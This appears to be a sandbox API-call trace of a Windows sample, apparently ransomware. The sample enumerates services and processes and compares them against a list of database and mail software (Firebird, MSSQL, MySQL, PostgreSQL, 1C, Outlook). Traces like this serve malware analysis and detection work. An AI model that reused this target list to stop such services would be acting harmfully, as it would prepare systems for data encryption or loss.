	[0169.461] EnumServicesStatusExW (in: hSCManager=0xb51c710, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb617698, cbBufSize=0x11e4, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb617698, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 1
	[0169.462] CloseServiceHandle (hSCObject=0xb51c710) returned 1
	[0169.462] lstrlenW (lpString="Appinfo") returned 7
	[0169.462] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1
	[0169.462] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1
	[0169.462] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1
	[0169.462] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1
	[0169.462] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1
	[0169.462] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0169.462] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0169.462] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0169.462] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0169.462] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0169.462] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0169.462] lstrlenW (lpString="AudioSrv") returned 8
	[0169.462] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0169.462] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0169.462] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0169.462] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0169.462] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0169.463] lstrlenW (lpString="BFE") returned 3
	[0169.463] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0169.463] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0169.463] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0169.463] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0169.463] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0169.463] lstrlenW (lpString="CryptSvc") returned 8
	[0169.463] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0169.463] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0169.463] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0169.463] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0169.463] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0169.463] lstrlenW (lpString="CscService") returned 10
	[0169.463] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0169.463] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0169.463] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0169.463] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0169.463] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0169.463] lstrlenW (lpString="DcomLaunch") returned 10
	[0169.463] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0169.463] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0169.463] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0169.463] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0169.463] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0169.463] lstrlenW (lpString="Dhcp") returned 4
	[0169.463] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0169.463] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0169.463] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0169.463] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0169.463] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0169.463] lstrlenW (lpString="Dnscache") returned 8
	[0169.463] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0169.464] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0169.464] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0169.464] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0169.464] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0169.464] lstrlenW (lpString="DPS") returned 3
	[0169.464] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0169.464] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0169.464] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0169.464] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0169.464] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0169.464] lstrlenW (lpString="eventlog") returned 8
	[0169.464] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0169.464] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0169.464] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0169.464] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0169.464] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0169.464] lstrlenW (lpString="EventSystem") returned 11
	[0169.464] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0169.464] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0169.464] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0169.464] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0169.464] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0169.464] lstrlenW (lpString="gpsvc") returned 5
	[0169.464] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0169.464] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0169.464] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0169.464] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0169.464] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0169.464] lstrlenW (lpString="iphlpsvc") returned 8
	[0169.464] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0169.464] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0169.464] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0169.464] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0169.464] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0169.464] lstrlenW (lpString="LanmanServer") returned 12
	[0169.464] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0169.465] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0169.465] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0169.465] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0169.465] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0169.465] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0169.465] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0169.465] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0169.465] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0169.465] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0169.465] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0169.465] lstrlenW (lpString="lmhosts") returned 7
	[0169.465] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0169.465] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0169.465] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0169.465] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0169.465] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0169.465] lstrlenW (lpString="MMCSS") returned 5
	[0169.465] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0169.465] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0169.465] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0169.465] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0169.465] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0169.465] lstrlenW (lpString="MpsSvc") returned 6
	[0169.465] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0169.465] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0169.465] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0169.465] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0169.465] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0169.465] lstrlenW (lpString="Netman") returned 6
	[0169.475] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1
	[0169.475] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1
	[0169.475] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1
	[0169.475] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1
	[0169.475] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1
	[0169.475] lstrlenW (lpString="netprofm") returned 8
	[0169.475] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1
	[0169.475] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1
	[0169.475] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1
	[0169.475] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1
	[0169.475] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1
	[0169.475] lstrlenW (lpString="NlaSvc") returned 6
	[0169.475] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0169.475] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0169.476] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0169.476] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0169.476] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0169.476] lstrlenW (lpString="nsi") returned 3
	[0169.476] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0169.476] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0169.476] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0169.476] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0169.476] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0169.476] lstrlenW (lpString="PcaSvc") returned 6
	[0169.476] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0169.476] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0169.476] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0169.476] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0169.476] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0169.476] lstrlenW (lpString="PlugPlay") returned 8
	[0169.476] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0169.476] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0169.476] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0169.476] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0169.476] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0169.476] lstrlenW (lpString="Power") returned 5
	[0169.476] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0169.476] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0169.476] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0169.476] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0169.476] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0169.476] lstrlenW (lpString="ProfSvc") returned 7
	[0169.476] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0169.476] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0169.476] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0169.476] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0169.476] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0169.476] lstrlenW (lpString="RpcEptMapper") returned 12
	[0169.476] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0169.477] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0169.477] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0169.477] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0169.477] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0169.477] lstrlenW (lpString="RpcSs") returned 5
	[0169.477] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0169.477] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0169.477] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0169.477] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0169.477] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0169.477] lstrlenW (lpString="SamSs") returned 5
	[0169.477] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0169.477] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0169.477] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0169.477] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0169.477] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0169.477] lstrlenW (lpString="Schedule") returned 8
	[0169.477] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0169.477] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0169.477] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0169.477] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0169.477] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0169.477] lstrlenW (lpString="SENS") returned 4
	[0169.477] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0169.477] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0169.477] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0169.477] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0169.477] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0169.477] lstrlenW (lpString="ShellHWDetection") returned 16
	[0169.477] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0169.477] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0169.477] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0169.477] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0169.477] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0169.478] lstrlenW (lpString="Spooler") returned 7
	[0169.478] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0169.478] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0169.478] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0169.478] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0169.478] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0169.478] lstrlenW (lpString="SysMain") returned 7
	[0169.478] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0169.478] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0169.478] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0169.478] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0169.478] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0169.478] lstrlenW (lpString="Themes") returned 6
	[0169.478] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0169.478] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0169.478] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0169.478] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0169.478] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0169.478] lstrlenW (lpString="TrkWks") returned 6
	[0169.478] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0169.478] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0169.478] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0169.478] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0169.478] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0169.478] lstrlenW (lpString="UxSms") returned 5
	[0169.478] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0169.478] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0169.478] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0169.479] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0169.479] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0169.479] lstrlenW (lpString="WdiServiceHost") returned 14
	[0169.479] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0169.479] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0169.479] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1
	[0169.479] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1
	[0169.479] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1
	[0169.479] lstrlenW (lpString="WdiSystemHost") returned 13
	[0169.479] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0169.479] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0169.479] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1
	[0169.479] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1
	[0169.479] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1
	[0169.479] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19
	[0169.479] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0169.479] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0169.479] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1
	[0169.479] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1
	[0169.479] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1
	[0169.479] lstrlenW (lpString="Winmgmt") returned 7
	[0169.479] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0169.479] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0169.479] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0169.479] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0169.479] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0169.479] lstrlenW (lpString="WPDBusEnum") returned 10
	[0169.479] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0169.479] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0169.479] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1
	[0169.479] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1
	[0169.479] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1
	[0169.479] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0xb617698 | out: hHeap=0x7ab0000) returned 1
	[0169.479] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x124
	[0169.493] Process32FirstW (in: hSnapshot=0x124, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0169.493] Process32NextW (in: hSnapshot=0x124, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x52, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0169.504] lstrlenW (lpString="System") returned 6
	[0169.504] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0169.504] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0169.504] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0169.504] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0169.504] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0169.504] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0169.504] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0169.504] Process32NextW (in: hSnapshot=0x124, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0169.505] lstrlenW (lpString="smss.exe") returned 8
	[0169.505] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0169.505] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0169.505] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0169.505] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0169.505] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0169.505] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0169.505] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0169.505] Process32NextW (in: hSnapshot=0x124, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0169.505] lstrlenW (lpString="csrss.exe") returned 9
	[0169.505] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0169.505] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0169.505] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0169.505] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0169.505] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0169.505] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0169.505] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0169.505] Process32NextW (in: hSnapshot=0x124, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0169.506] lstrlenW (lpString="wininit.exe") returned 11
	[0169.506] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0169.506] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0169.506] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0169.506] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0169.506] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0169.506] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0169.506] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0169.506] Process32NextW (in: hSnapshot=0x124, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0169.506] lstrlenW (lpString="csrss.exe") returned 9
	[0169.506] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0169.506] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0169.506] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0169.506] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0169.506] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0169.506] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
